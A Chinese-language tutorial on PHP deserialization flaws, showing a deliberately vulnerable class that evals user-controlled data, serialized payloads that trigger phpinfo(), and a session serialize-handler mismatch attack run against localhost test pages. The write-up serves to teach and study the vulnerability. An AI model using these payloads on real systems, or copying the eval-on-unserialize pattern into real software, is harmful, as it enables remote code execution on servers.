PHP反序列化漏洞

【序列化簡單利用】　

　   serialize() 序列化：使用函數serialize()可將實例序列化為字符串
　　unserialize() 反序列化：使用函數unserialize()可將序列化的字符串還原

代碼示例：

<?php
class Example {
    var $var = '';
    function __destruct() {
        eval($this->var);
    }
}
unserialize($_GET['code']);
?>

漏洞利用：

構造漏洞利用的代碼，保存為test.php，獲取序列化值為  O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}

<?php
class Example {
    var $var = 'phpinfo();';
    function __destruct() {
        eval($this->var);
    }
}
$a=new Example();
echo serialize($a);
?>

提交?code=O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}  即可執行phpinfo()

【PHP SESSION反序列化】

   主要原因是： ini_set(‘session.serialize_handler’, ‘php_serialize’);

　　　　　　　ini_set(‘session.serialize_handler’, ‘php’);

　　　　　　　兩者處理session的方式不同

<?php
ini_set('session.serialize_handler','php_serialize');
//ini_set('session.serialize_handler','php');
session_start();
$_SESSION["test"]=$_GET["a"];
?>
//提交?a=1111

輸出結果：
php_serialize： a:1:{s:4:"test";s:4:"1111";}
php: test|s:4:"1111";

如果在PHP在反序列化存儲的$_SESSION數據時使用的引擎和序列化使用的引擎不一樣，會導致數據無法正確第反序列化。通過精心構造的數據包，就可以繞過程序的驗證或者是執行一些系統的方法
代碼示例：
新建test1.php

<?php
ini_set('session.serialize_handler', 'php');
session_start();
class test {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
?>

新建test2.php

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION["test"]=$_GET["a"];
?>

漏洞利用：

構造利用代碼

<?php
class test {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
$a=new test();
echo serialize($a);

?>

獲取反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}

步驟一：提交test2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}，

　　　　傳入的數據會按照php_serialize來進行序列化：a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}

步驟二：然后再訪問http://127.0.0.1/test1.php,成功執行phpinfo()

　　　　此時訪問test1.php，應用程序會按照php來反序列化SESSION中的數據，此時就會反序列化偽造的數據，php引擎會以|作為作為key和value的分隔符，那么就會將a:1:{s:4:"test";s:43:"作為SESSION的key，將O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作為value，然后進行反序列化，最后就會就會實例化test對象，最后就會執行析構函數中的eval()方法。

 

 

參考文章：

PHP反序列化漏洞  http://wyb0.com/posts/php-deserialization-vulnerabilities/

PHP反序列化 代碼執行 https://www.cnblogs.com/yinqin/articles/4962837.html

PHP中SESSION反序列化機制  https://blog.spoock.com/2016/10/16/php-serialize-problem/